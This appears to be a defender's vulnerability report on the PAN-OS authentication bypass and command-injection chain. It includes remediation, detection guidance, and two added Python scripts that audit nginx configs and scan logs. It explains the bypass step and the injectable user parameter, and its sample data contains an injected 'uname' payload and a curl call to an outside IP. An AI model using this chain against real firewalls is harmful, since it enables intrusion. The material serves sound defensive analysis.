Full Report
SSLVPN is essential protection for defenders. As a result, threat actors are constantly looking for bugs in it. This article describes and explains a vulnerability being used in an active campaign. The authors found it by diffing the changes in the patch. The first interesting diff was in the Nginx route configuration at /etc/nginx/conf/locations.conf. The changes set a number of proxy headers to the empty string and one of them to 'on'. Most notably, the X-pan-AuthCheck header was now being forced to 'on'. The X-pan-AuthCheck header is used as part of an authentication check in uiEnvSetup.php. Authentication is entirely bypassed by providing this header and setting it to 'off'. Hype! Once logged in to an application like this, RCE is practically a feature. AuditLog.php has a fairly obvious command injection. However, they were not entirely sure where the actual input came from; they just knew it had to do with user impersonation. After trying a bunch of endpoints, they eventually found one that triggered the command injection from the username parameter on the call. I personally liked the patch-diffing part of this article. As a defender of other companies, like this one, understanding what the vulnerability is and what you're up against is a requirement. So, I imagine you do a good amount of reverse engineering for these types of patches. Good work and knowledge sharing!
Analysis Summary
# Vulnerability: Palo Alto PAN-OS Auth Bypass and RCE Chain
## CVE Details
- **CVE ID:** CVE-2024-0012 (Authentication Bypass), CVE-2024-9474 (Privilege Escalation)
- **CVSS Score:** 9.3 (Critical) for CVE-2024-0012; 6.9 (Medium/High) for CVE-2024-9474
- **CWE:** CWE-288 (Authentication Bypass Using an Alternate Path), CWE-78 (OS Command Injection)
## Affected Systems
- **Products:** Palo Alto Networks PA-Series, VM-Series, and Panorama models.
- **Versions:** PAN-OS 10.2, 11.0, 11.1, and 11.2 (Specific maintenance releases vary; see remediation).
- **Configurations:** Systems with the **Management Web Interface** accessible to the internet.
## Vulnerability Description
This vulnerability is a chain of two flaws found in the PHP-based management interface:
1. **CVE-2024-0012:** An authentication bypass exists in the `uiEnvSetup.php` script (prepended to all requests via `php.ini`). The application checks the `X-PAN-AUTHCHECK` HTTP header; if set to `off`, it skips standard session validation. While Nginx normally strips or overrides this header, specific route configurations allowed attackers to pass this header through, gaining administrative access.
2. **CVE-2024-9474:** A command injection vulnerability in `AuditLog.php`. The application uses shell execution (backticks) to process user parameters. An authenticated (or bypassed) user can inject shell commands into the `user` parameter of certain API calls, leading to execution as the `web-backend` user (effectively RCE).
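The bypass only works on routes where Nginx does not overwrite the client-supplied header before proxying to PHP. The following added example (not code from the original page or from Palo Alto Networks) audits a constructed `locations.conf`-style fragment for that condition: every `location` block is checked for a `proxy_set_header X-pan-AuthCheck ...;` directive, and any block that forwards the client value unchanged, or forces it to `off`, is reported. The directive name, the sample paths and the fragment itself are assumptions made for illustration; the appliance's real configuration is not reproduced on the page.

```python
import re

# Constructed nginx fragment in the style of a locations.conf.  The first block
# forces the header to "on" before proxying, the second removes it entirely
# (an empty proxy_set_header value drops the header), and the third forwards
# whatever the client sent, so a client-supplied "off" reaches the PHP backend.
SAMPLE_LOCATIONS_CONF = """
location /php/ {
    proxy_set_header X-pan-AuthCheck on;
    proxy_pass http://127.0.0.1:8080;
}
location /api/ {
    proxy_set_header X-pan-AuthCheck "";
    proxy_pass http://127.0.0.1:8080;
}
location /unauth/ {
    proxy_pass http://127.0.0.1:8080;
}
"""

# Flat (non-nested) location blocks are enough for this audit.
LOCATION_RE = re.compile(r"location\s+([^\s{]+)\s*\{(.*?)\}", re.DOTALL)
HEADER_RE = re.compile(r"proxy_set_header\s+X-pan-AuthCheck\s+([^;]+);", re.IGNORECASE)

PASSTHROUGH = "PASSTHROUGH"  # marker: no override, client value reaches the backend


def audit_authcheck_override(conf: str) -> dict[str, str]:
    """Map each location path to the X-pan-AuthCheck value nginx forces on it.

    A location with no proxy_set_header for this header is marked PASSTHROUGH.
    """
    findings = {}
    for m in LOCATION_RE.finditer(conf):
        path, body = m.group(1), m.group(2)
        h = HEADER_RE.search(body)
        if h is None:
            findings[path] = PASSTHROUGH
        else:
            findings[path] = h.group(1).strip().strip("\"'")
    return findings


def insecure_locations(conf: str) -> list[str]:
    """Locations where a client-controlled or explicit 'off' header reaches PHP."""
    return sorted(
        path for path, value in audit_authcheck_override(conf).items()
        if value == PASSTHROUGH or value.lower() == "off"
    )


if __name__ == "__main__":
    for path, value in audit_authcheck_override(SAMPLE_LOCATIONS_CONF).items():
        print(f"{path:12} X-pan-AuthCheck -> {value or '(header removed)'}")
    print("insecure:", insecure_locations(SAMPLE_LOCATIONS_CONF))
```

The audit treats both a forced `on` and an empty value (header removed) as safe, because in either case the backend never sees a client-chosen `off`; only a pass-through block or an explicit `off` is flagged.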
## Exploitation
- **Status:** Exploited in the wild.
- **Complexity:** Low.
- **Attack Vector:** Network (specifically targeting the Management Interface).
## Impact
- **Confidentiality:** High (Full access to device configuration and secrets).
- **Integrity:** High (Ability to modify firewall rules and system files).
- **Availability:** High (Ability to disable the appliance or disrupt traffic).
## Remediation
### Patches
Update to the following versions or later:
- PAN-OS 10.2.12-h2
- PAN-OS 11.0.6-h1
- PAN-OS 11.1.5-h1
- PAN-OS 11.2.4-h1
### Workarounds
- **Isolate Management Interface:** Immediately restrict access to the management web interface to only trusted internal IP addresses. Do not expose it to the public internet.
- **Apply Security Profile:** Use a "Threat Prevention" profile to block known exploitation patterns if traffic passes through another Palo Alto firewall.
## Detection
- **Indicators of Compromise:**
  - Look for the presence of the `X-PAN-AUTHCHECK: off` header in web server logs (though logs may be manipulated).
  - Check for unexpected files in `/var/appweb/htdocs/unauth/`.
  - Monitor for processes spawned by the web server user (`www-data` or `web-backend`) executing shell commands (e.g., `uname`, `curl`, `sh`).
- **Tools:** Use the watchTowr Nuclei template to scan management interfaces for vulnerability.
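The indicators above can be turned into a small offline triage script. The following added example (not from the original page, the watchTowr write-up, or the vendor) runs two checks over constructed sample data: it parses access-log lines and flags requests that carried `X-PAN-AUTHCHECK: off` or shell metacharacters in the `user` query parameter, and it flags shells and download tools running as the web-server user in a list of process records. Assumptions: the access-log format appends the client's `X-PAN-AUTHCHECK` value as a final quoted field, the `/php/` URL prefix is a placeholder, and the process records are a simplified stand-in for EDR or auditd output.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed nginx-style access-log lines.  Assumption: a custom log_format
# records the client-supplied X-PAN-AUTHCHECK header as the last quoted field
# ("-" when absent).  The /php/ prefix is a constructed placeholder.
SAMPLE_ACCESS_LOG = [
    '10.0.0.8 - - [18/Nov/2024:09:58:01 +0000] "GET /php/login.php HTTP/1.1" 200 5120 "-"',
    '203.0.113.5 - - [18/Nov/2024:10:02:15 +0000] "GET /php/AuditLog.php?user=admin HTTP/1.1" 200 311 "off"',
    '203.0.113.5 - - [18/Nov/2024:10:02:16 +0000] "GET /php/AuditLog.php?user=admin%3Buname%20-a HTTP/1.1" 200 90 "off"',
    '10.0.0.9 - - [18/Nov/2024:10:03:40 +0000] "GET /php/AuditLog.php?user=audit HTTP/1.1" 200 311 "on"',
]

# Constructed process records: (user the process runs as, parent command, command line).
SAMPLE_PROCESS_EVENTS = [
    ("web-backend", "php-fpm", "sh -c uname -a"),
    ("web-backend", "php-fpm", "php /var/appweb/htdocs/index.php"),
    ("root", "cron", "sh -c /usr/bin/logrotate"),
    ("www-data", "nginx", "curl http://198.51.100.7/x"),
]

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "(?P<authcheck>[^"]*)"$'
)
SHELL_META = re.compile(r"[;|&`]|\$\(")          # characters that end or chain a shell command
WEB_USERS = {"web-backend", "www-data"}          # accounts the web server runs as (from the page)
SUSPICIOUS_CMDS = {"sh", "bash", "curl", "wget", "uname"}


def scan_access_log(lines):
    """Return (client ip, reason, request target) for each suspicious request."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these
        ip, target = m.group("ip"), m.group("target")
        # Indicator 1: client asked the backend to skip authentication.
        if m.group("authcheck").lower() == "off":
            findings.append((ip, "authcheck-off", target))
        # Indicator 2: the injectable 'user' parameter carries shell syntax.
        query = parse_qs(urlsplit(target).query)  # parse_qs URL-decodes values
        for value in query.get("user", []):
            if SHELL_META.search(value):
                findings.append((ip, "user-param-shell-meta", target))
    return findings


def scan_process_events(events):
    """Return command lines of shells/download tools spawned as the web-server user."""
    flagged = []
    for user, _parent, cmd in events:
        binary = cmd.split()[0].rsplit("/", 1)[-1]  # basename of argv[0]
        if user in WEB_USERS and binary in SUSPICIOUS_CMDS:
            flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    for ip, reason, target in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"[{reason}] {ip} {target}")
    for cmd in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[web-user-shell] {cmd}")
```

Because the page notes that web logs may be manipulated after compromise, the process-level check is the more robust of the two when it can be fed from an independent source such as auditd or an EDR agent.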
## References
- Vendor Advisory (CVE-2024-0012): hxxps[://]security[.]paloaltonetworks[.]com/CVE-2024-0012
- Vendor Advisory (CVE-2024-9474): hxxps[://]security[.]paloaltonetworks[.]com/CVE-2024-9474
- Analysis by watchTowr Labs: hxxps[://]labs[.]watchtowr[.]com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/